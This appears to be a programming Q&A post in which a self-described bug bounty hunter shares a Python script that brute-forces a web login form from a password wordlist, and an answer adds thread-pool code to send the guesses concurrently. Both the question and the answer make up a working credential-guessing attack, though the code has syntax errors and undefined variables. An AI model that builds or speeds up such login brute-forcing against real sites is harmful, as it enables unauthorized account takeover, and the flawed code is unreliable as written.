# How can I add threads to this python code to make multiple request

Tags: python, multithreading, python-2.7, python-requests, python-multithreading

i am creating a custom tool for login bruteforce on web application for bug bounty hunting so i came to a bug on one web application which i had to create my own tool to bruteforce this is not a complete tool but i need solution for the current code for adding threads

```
import requests
import re
exploit = open('password.txt', 'r').readlines()
headers = {
    'Host': 'TARGET.COM',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'iframe',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-User': '?1'
}
for line in exploit:
        params = {
        'execution': '111u9342',
        'client_id': 'client-23429df',
        'tab_id': '234324',
}
    password = line.strip()
    http = requests.post('https://www.target.com/test',
    params=params,
    headers=headers,
    data={'username':myname,'password':password},
    verify=False,
    proxies=proxies)
    content = http.content
               
print("finished")
```

I am beginner in python

Answer (score 1):

You can use it ThreadPoolExecuter;

```
from concurrent.futures import ThreadPoolExecutor

import requests

# ....Other code parts...

def base_post(url, header, data, proxies, timeout=10):
    response = requests.post(url, headers=header, data=data, proxies=proxies, timeout=timeout)
    return response


total_possibilities = []
exploit = []
for line in exploit:
    params = {
        'execution': '111u9342',
        'client_id': 'client-23429df',
        'tab_id': '234324',
    }
    password = line.strip()
    total_possibilities.append({'url': "...",
                                "params": params,
                                "headers": headers,
                                "data": {'username': myname, 'password': password},
                                "verify": False,
                                "proxies": proxies
                                "content": http.content})

results = []
with ThreadPoolExecutor(max_workers=3) as executor:
    for row in total_possibilities:
        results.append(executor.submit(base_post, **row))
print(results)
```

Don't forget to update "max_workers" based on your needs.